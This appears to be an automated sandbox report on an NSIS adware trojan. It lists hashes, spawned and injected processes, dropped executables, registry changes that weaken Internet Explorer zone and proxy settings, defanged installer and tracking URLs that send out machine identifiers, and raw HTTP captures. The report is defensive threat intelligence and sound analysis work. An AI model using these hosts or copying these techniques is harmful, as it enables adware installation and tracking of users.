Trojan.NSIS.StartPage_1680b2466a
not-a-virus:HEUR:AdWare.Win32.OutBrowse.heur (Kaspersky), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
| Requires JavaScript enabled! |
|---|
MD5: 1680b2466adbd5ceb0c4c45b9b6f8e31
SHA1: f10543e13affa8c9642ad9f245ebe0fee5094450
SHA256: 2638ff8e1d3d9366a06f2c56e982050990b8663831197aacf1fd59c8c3f3b4d2
SSDeep: 6144:OFJ0FmL52W LRGxoxtM4PgLkrrN4d2AP/8zbsHCwxSsLk2GTO:3meLoxG6ygLnkIEzb5wo73O
Size: 347904 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: ZBKHQ
Created at: 2009-12-06 00:52:12
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
wmic.exe:224
SktAKlNMSg==29820.exe:1948
%original file name%.exe:1832
SktAKlNMSg==10700.exe:1016
The Trojan injects its code into the following process(es):
beeiheibdh.exe:320
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process wmic.exe:224 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\81449533620.txt (238 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\81449533620.txt (0 bytes)
The process SktAKlNMSg==29820.exe:1948 makes changes in the file system.
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsz3.tmp (0 bytes)
The process beeiheibdh.exe:320 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IKPZAXUL\OperaChecker25-6[1].exe (8606 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IHC78LGB\button[1].png (458 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y1QF6BIV\dc[1].js (1327 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9XALHNJO\XPLimitChecker[1].exe (7051 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IHC78LGB\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9XALHNJO\button_over[1].png (921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IKPZAXUL\bodyImg[1].png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IKPZAXUL\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9XALHNJO\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y1QF6BIV\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IHC78LGB\DynamicOfferScreen[1].htm (2083 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\81449533620\SktAKlNMSg==10700.exe (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\81449533620\SktAKlNMSg==29820.exe (1039 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\81449533620.txt (0 bytes)
The process %original file name%.exe:1832 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\beeiheibdh.exe (17585 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsn1.tmp (0 bytes)
The process SktAKlNMSg==10700.exe:1016 makes changes in the file system.
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nss2.tmp (0 bytes)
Registry activity
The process wmic.exe:224 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A6 4A 62 FE 70 A9 A7 4E 94 5D 0A B4 A3 7C 04 0F"
The process SktAKlNMSg==29820.exe:1948 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "57 54 6E AE AC 3B 16 29 D6 41 2A 4A 30 AE 8A A6"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\xplmtOB]
"Install" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process beeiheibdh.exe:320 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7B 64 12 4E 3D 93 B6 09 D2 10 E6 26 6C 5E BF 32"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:1832 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B3 82 EE E9 D3 36 AB AC 8D 5F 69 7F C9 24 FF D9"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process SktAKlNMSg==10700.exe:1016 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AF CD E7 D4 4E 7B 45 92 FC 55 2F 8F D2 31 B8 52"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\OperaOB]
"Install" = "1"
Dropped PE files
| MD5 | File path |
|---|---|
| 10ffabc748d68c40b68f883058c9b932 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\81449533620\SktAKlNMSg==10700.exe |
| b6631cd12092841cac0763c854828c50 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\81449533620\SktAKlNMSg==29820.exe |
| 8e136fec12670beb407dc0dbf298da1a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\beeiheibdh.exe |
| b6631cd12092841cac0763c854828c50 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\9XALHNJO\XPLimitChecker[1].exe |
| 10ffabc748d68c40b68f883058c9b932 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\IKPZAXUL\OperaChecker25-6[1].exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: ZBKHQ
Product Name: ZBKHQ
Product Version: 9668.151129.1376.2444
Legal Copyright: ZBKHQ
Legal Trademarks: ZBKHQ
Original Filename:
Internal Name:
File Version: 9668.151129.1376.2444
File Description: ZBKHQ
Comments: ZBKHQ
Language: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 23628 | 24064 | 4.46304 | c52a72deb0170941d392ec38c6aeafd0 |
| .rdata | 28672 | 4764 | 5120 | 3.4982 | dc77f8a1e6985a4361c55642680ddb4f |
| .data | 36864 | 298072 | 1024 | 3.32453 | 723ad80df002dc5421798f4307abe5cf |
| .ndata | 335872 | 311296 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rsrc | 647168 | 54360 | 54784 | 2.837 | a8b3bcf84e85d70aff0afba24326d552 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 20
40cb9cd3e5626cae94c2ea27f65464ac
ca0c561c4ebfe1029991b16eac62bf03
da3616dd26b6bf7a885c15f2f9111acb
b65fac1a455b2e275e4d0738c04b5090
19a85f56c977d48878d6befcdef3b8d4
7dca486aed687fe2c05c4ec7ffdc372f
a51844767bd7b41fa10134c456f48543
a3b8dc9f32dfcc6a0f900b05ca19ff89
bc7921d8a2910529db3ef88a05d42558
aab41deb35275a7404573bb72741cfae
6c251ffac53e931f3a6f1d5526fca1be
a9565ef7bfd6ef49d153fa3003c053e4
3288fef1a6ceb13ec838ffddd7aa558b
d5f81c83311922bec2b1d0896fb2195e
9ee53d2636332d0e68aa5372e59fadc8
8ab566312373eb090bd3ae796976cb4f
85061626e8e5f2121265e37fba465a25
70aa884dd9715b68816df8ef13656f48
2bb1e619605607448d076a86f652e3de
2068a72d3918bf2aac5017b54aae5b1c
URLs
| URL | IP |
|---|---|
| hxxp://d2vubraihqcany.cloudfront.net/Installer/XP/XPLimitChecker.exe | |
| hxxp://smartinstaller.elasticbeanstalk.com/Installer/Flow?pubid=7302&distid=15267&productid=2917&subpubid=0&campaignid=0&networkid=0&dfb=0&os=5.1&ospv=-1&iev=6.0&ffv=&chromev=&macaddress=00:0C:29:8A:8B:37&netv=&d1=28252&d2=-1&d3=-1&d4=-1&d5=-1&ds1=&hb=0&systembit=32&vm=1&machineguid=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&welcomeimgurl=&downloadip=189.123.105.29&downloadtime=11/29/2015 12:46:24 AM&clickid=v8-J_m3CyDkqnfRAoauzm_7BaD8xRVk9mGYrhLIFYhQSHh9KLg8pM9Ib1OydrBoe99KcupqnYgyzDYUksawob-qvOnUuY6WncactzuB9plk12PReasizlLIkP6m86qU3RE4sStRb0XHkmJdQSY75uiYB0YLBr_y8OC7XfXmzoL4U5jGlhcZKXJVVujwdL0uZ&version=6.12&nipids=-29408-28693-28657-29219-29736&secondcall=1&reqid=377145248 | |
| hxxp://smartinstaller.elasticbeanstalk.com/Installer/Track?pubid=7302&distid=15267&productid=2917&subpubid=0&campaignid=0&networkid=0&reqid=377145248&dfb=0&os=5.1&ospv=-1&iev=6.0&ffv=&chromev=&macaddress=00:0C:29:8A:8B:37&netv=&d1=28252&d2=-1&d3=-1&d4=-1&d5=-1&ds1=&hb=0&systembit=32&vm=1&machineguid=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&welcomeimgurl=&downloadip=189.123.105.29&downloadtime=11/29/2015 12:46:24 AM&clickid=v8-J_m3CyDkqnfRAoauzm_7BaD8xRVk9mGYrhLIFYhQSHh9KLg8pM9Ib1OydrBoe99KcupqnYgyzDYUksawob-qvOnUuY6WncactzuB9plk12PReasizlLIkP6m86qU3RE4sStRb0XHkmJdQSY75uiYB0YLBr_y8OC7XfXmzoL4U5jGlhcZKXJVVujwdL0uZ&status=2&installedid=29820&z=1&offerscreenid=655&offerorder=-1&downloadduration=-1&installduration=-1&issecond=0 | |
| hxxp://smartinstaller.elasticbeanstalk.com//offers/DynamicOfferScreen?offerid=5&distid=15267&leadp=2917&countryid=262&sysbit=32&imgurl=&dfb=0&hb=0&isagg=1&version=6.12&external=0& | |
| hxxp://staticrevenyou.outbrowse.netdna-cdn.com/offers/images/Theme12/topLine.jpg | |
| hxxp://staticrevenyou.outbrowse.netdna-cdn.com/offers/images/Theme12/topComp.png | |
| hxxp://stats.l.doubleclick.net/dc.js | |
| hxxp://staticrevenyou.outbrowse.netdna-cdn.com/offers/images/Theme12/bgImg.jpg | |
| hxxp://staticrevenyou.outbrowse.netdna-cdn.com/offers/images/Theme12/bodyImg.png | |
| hxxp://staticrevenyou.outbrowse.netdna-cdn.com/offers/images/Theme12/bottomLine.jpg | |
| hxxp://staticrevenyou.outbrowse.netdna-cdn.com/offers/images/Theme12/nextCase.jpg | |
| hxxp://staticrevenyou.outbrowse.netdna-cdn.com/offers/images/Theme12/button_over.png | |
| hxxp://staticrevenyou.outbrowse.netdna-cdn.com/offers/images/Theme12/button.png | |
| hxxp://srv.DESK-TOP-APP.INFO/Installer/Flow?pubid=7302&distid=15267&productid=2917&subpubid=0&campaignid=0&networkid=0&dfb=0&os=5.1&ospv=-1&iev=6.0&ffv=&chromev=&macaddress=00:0C:29:8A:8B:37&netv=&d1=28252&d2=-1&d3=-1&d4=-1&d5=-1&ds1=&hb=0&systembit=32&vm=1&machineguid=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&welcomeimgurl=&downloadip=189.123.105.29&downloadtime=11/29/2015 12:46:24 AM&clickid=v8-J_m3CyDkqnfRAoauzm_7BaD8xRVk9mGYrhLIFYhQSHh9KLg8pM9Ib1OydrBoe99KcupqnYgyzDYUksawob-qvOnUuY6WncactzuB9plk12PReasizlLIkP6m86qU3RE4sStRb0XHkmJdQSY75uiYB0YLBr_y8OC7XfXmzoL4U5jGlhcZKXJVVujwdL0uZ&version=6.12&nipids=-29408-28693-28657-29219-29736&secondcall=1&reqid=377145248 | |
| hxxp://cdn.download4desktop.com/Installer/OperaBrowser/OperaChecker25-6.exe | |
| hxxp://static.revenyou.com/offers/images/Theme12/button_over.png | |
| hxxp://srv.DESK-TOP-APP.INFO/Installer/Track?pubid=7302&distid=15267&productid=2917&subpubid=0&campaignid=0&networkid=0&reqid=377145248&dfb=0&os=5.1&ospv=-1&iev=6.0&ffv=&chromev=&macaddress=00:0C:29:8A:8B:37&netv=&d1=28252&d2=-1&d3=-1&d4=-1&d5=-1&ds1=&hb=0&systembit=32&vm=1&machineguid=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&welcomeimgurl=&downloadip=189.123.105.29&downloadtime=11/29/2015 12:46:24 AM&clickid=v8-J_m3CyDkqnfRAoauzm_7BaD8xRVk9mGYrhLIFYhQSHh9KLg8pM9Ib1OydrBoe99KcupqnYgyzDYUksawob-qvOnUuY6WncactzuB9plk12PReasizlLIkP6m86qU3RE4sStRb0XHkmJdQSY75uiYB0YLBr_y8OC7XfXmzoL4U5jGlhcZKXJVVujwdL0uZ&status=2&installedid=29820&z=1&offerscreenid=655&offerorder=-1&downloadduration=-1&installduration=-1&issecond=0 | |
| hxxp://static.revenyou.com/offers/images/Theme12/bgImg.jpg | |
| hxxp://static.revenyou.com/offers/images/Theme12/bodyImg.png | |
| hxxp://static.revenyou.com/offers/images/Theme12/bottomLine.jpg | |
| hxxp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=5&distid=15267&leadp=2917&countryid=262&sysbit=32&imgurl=&dfb=0&hb=0&isagg=1&version=6.12&external=0& | |
| hxxp://stats.g.doubleclick.net/dc.js | |
| hxxp://static.revenyou.com/offers/images/Theme12/topComp.png | |
| hxxp://static.revenyou.com/offers/images/Theme12/topLine.jpg | |
| hxxp://srv.DESK-TOP-APP.INFO/Installer/Flow?pubid=7302&distid=15267&productid=2917&subpubid=0&campaignid=0&networkid=0&dfb=0&os=5.1&ospv=-1&iev=6.0&ffv=&chromev=&macaddress=00:0C:29:8A:8B:37&netv=&d1=28252&d2=-1&d3=-1&d4=-1&d5=-1&ds1=&hb=0&systembit=32&vm=1&machineguid=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&welcomeimgurl=&downloadip=189.123.105.29&downloadtime=11/29/2015 12:46:24 AM&clickid=v8-J_m3CyDkqnfRAoauzm_7BaD8xRVk9mGYrhLIFYhQSHh9KLg8pM9Ib1OydrBoe99KcupqnYgyzDYUksawob-qvOnUuY6WncactzuB9plk12PReasizlLIkP6m86qU3RE4sStRb0XHkmJdQSY75uiYB0YLBr_y8OC7XfXmzoL4U5jGlhcZKXJVVujwdL0uZ&version=6.12 | |
| hxxp://srv.DESK-TOP-APP.INFO/Installer/Track?pubid=7302&distid=15267&productid=2917&subpubid=0&campaignid=0&networkid=0&reqid=377145248&dfb=0&os=5.1&ospv=-1&iev=6.0&ffv=&chromev=&macaddress=00:0C:29:8A:8B:37&netv=&d1=28252&d2=-1&d3=-1&d4=-1&d5=-1&ds1=&hb=0&systembit=32&vm=1&machineguid=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&welcomeimgurl=&downloadip=189.123.105.29&downloadtime=11/29/2015 12:46:24 AM&clickid=v8-J_m3CyDkqnfRAoauzm_7BaD8xRVk9mGYrhLIFYhQSHh9KLg8pM9Ib1OydrBoe99KcupqnYgyzDYUksawob-qvOnUuY6WncactzuB9plk12PReasizlLIkP6m86qU3RE4sStRb0XHkmJdQSY75uiYB0YLBr_y8OC7XfXmzoL4U5jGlhcZKXJVVujwdL0uZ&status=2&installedid=10700&z=1&offerscreenid=234&offerorder=-1&downloadduration=-1&installduration=-1&issecond=0 | |
| hxxp://static.revenyou.com/offers/images/Theme12/button.png | |
| hxxp://static.revenyou.com/offers/images/Theme12/nextCase.jpg | |
| srv.desk-top-app.info |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY Executable served from Amazon S3
Traffic
GET /offers/images/Theme12/topComp.png HTTP/1.1
Accept: */*
Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=5&distid=15267&leadp=2917&countryid=262&sysbit=32&imgurl=&dfb=0&hb=0&isagg=1&version=6.12&external=0&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: static.revenyou.com
Connection: Keep-Alive
HTTP/1.1 404 Not Found
Date: Tue, 08 Dec 2015 00:13:50 GMT
Content-Type: text/html
Content-Length: 1245
Connection: keep-alive
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://
VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content
-Type" content="text/html; charset=iso-8859-1"/>..<title>404
- File or directory not found.</title>..<style type="text/css
">..<!--..body{margin:0;font-size:.7em;font-family:Verdana, Aria
l, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px
10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:
1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;
color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px
2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..backgr
ound-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...c
ontent-container{background:#FFF;width:96%;margin-top:8px;padding:10px
;position:relative;}..-->..</style>..</head>..<body&
gt;..<div id="header"><h1>Server Error</h1></div&
gt;..<div id="content">.. <div class="content-container">&
lt;fieldset>.. <h2>404 - File or directory not found.</h2
>.. <h3>The resource you are looking for might have been rem
oved, had its name changed, or is temporarily unavailable.</h3>.
. </fieldset></div>..</div>..</body>..</htm
l>......<<< skipped >>>
GET /offers/images/Theme12/bodyImg.png HTTP/1.1
Accept: */*
Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=5&distid=15267&leadp=2917&countryid=262&sysbit=32&imgurl=&dfb=0&hb=0&isagg=1&version=6.12&external=0&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: static.revenyou.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Tue, 08 Dec 2015 00:13:50 GMT
Content-Type: image/png
Content-Length: 1914
Connection: keep-alive
Cache-Control: max-age=604800
Last-Modified: Mon, 05 Aug 2013 10:27:32 GMT
ETag: "36dd864c691ce1:0"
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
Expires: Tue, 15 Dec 2015 00:13:50 GMT
X-Cache: HIT
Accept-Ranges: bytes.PNG........IHDR.......:.....j.......sRGB.........gAMA......a.... cHRM
..z&..............u0...`..:....p..Q<...0PLTE.......................
.........................{.......IDATx......:..`..p..J.4.ty.:......)v.
.\....,.fwv..U...!.....b.f.....Cy(..OW......w......]R..l..2My}<..].
.8hn{*..X.).m..4w.U.J.....u..l.J...<...>uJ.....i.>o.%......I.
\..S......U.D.}OK..J`......sJ`.}..M.9%..A....u.T.%........K....OQ..._.
.d.>..L....]I. U.].c.Je...|.W.U?..E.}...*.vZ...K...M....).W...^V..&
gt;).e(.].Z.}dg%@....S.*/...........Y.W.]}...|.SgO........rrj...4UY../
..r.~.....Z.ep.wui.sP^..X.g%$(.......C........Ze....4yn}....U.({.V..{o
..}O...w.G.Q.^..r..p....0y............8......6.v....zz~....-...F*..f.F
]...R..*. -......e{mO.s.i.9.U....zz.6.f.T>.f.DQ%.. ...l.q\N."eA({_W
7..Q.....d........>...Y.."e.\....s,.. .Li)%....R.o.....C.9wQ....8..
......KNY..t..)...k...v)P*.....I...4&../.{)..qe..R.'...2..*..d.z&.T;y.
.)Q*....)R..2..)Tj.B..)V..b..)W......QB!rj.B.J)..N)b*...R)q..<S...z
%.LPr..%.LQ2.4e.....q&*c.De,..J.x& ig...g..b.(.g..p.)Qf..uf*1g..af .Y.
..... .;(.....s......r.v. ...s'...K.0wS.....sG%.......-.R..}......4S..
...W.....=.9eN(..OS..Jt(...<...P.(..DJ;_)..Y. ..7.>[email protected])e
M.qi;...........$.z%.[..P...SJzT*E]......2zT.t..L%6.TJ..Y.a...}.V..J..
.,.....H... ....;..2_._/[.^/[.\.W.\.!..%oT*y.Z....#Q.Bw.FI.7...H..2Jt.
*..../........2.F..X.....gqJ.q:.U.q.. V...B..s.(.J2.x..()#1@.'d4.Hh.h.
J.I.i.G.#.;.J....*Q$Z..?.........sR..D.<...| ......2.1b.A3...v.....
X.y{..R....{h..pzJ.I.).Y..Kn.z;%Jn..c.W...bL........t..!...A..(..*<<< skipped >>>
GET /offers/images/Theme12/bottomLine.jpg HTTP/1.1
Accept: */*
Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=5&distid=15267&leadp=2917&countryid=262&sysbit=32&imgurl=&dfb=0&hb=0&isagg=1&version=6.12&external=0&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: static.revenyou.com
Connection: Keep-Alive
HTTP/1.1 404 Not Found
Date: Tue, 08 Dec 2015 00:13:50 GMT
Content-Type: text/html
Content-Length: 1245
Connection: keep-alive
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://
VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content
-Type" content="text/html; charset=iso-8859-1"/>..<title>404
- File or directory not found.</title>..<style type="text/css
">..<!--..body{margin:0;font-size:.7em;font-family:Verdana, Aria
l, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px
10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:
1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;
color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px
2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..backgr
ound-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...c
ontent-container{background:#FFF;width:96%;margin-top:8px;padding:10px
;position:relative;}..-->..</style>..</head>..<body&
gt;..<div id="header"><h1>Server Error</h1></div&
gt;..<div id="content">.. <div class="content-container">&
lt;fieldset>.. <h2>404 - File or directory not found.</h2
>.. <h3>The resource you are looking for might have been rem
oved, had its name changed, or is temporarily unavailable.</h3>.
. </fieldset></div>..</div>..</body>..</htm
l>......<<< skipped >>>
GET /offers/images/Theme12/button_over.png HTTP/1.1
Accept: */*
Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=5&distid=15267&leadp=2917&countryid=262&sysbit=32&imgurl=&dfb=0&hb=0&isagg=1&version=6.12&external=0&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: static.revenyou.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Tue, 08 Dec 2015 00:13:50 GMT
Content-Type: image/png
Content-Length: 921
Connection: keep-alive
